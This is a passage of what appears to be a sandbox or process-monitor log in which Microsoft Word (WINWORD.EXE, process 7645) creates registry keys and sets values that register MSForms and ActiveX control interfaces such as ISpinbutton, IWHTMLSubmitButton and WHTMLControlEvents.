7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
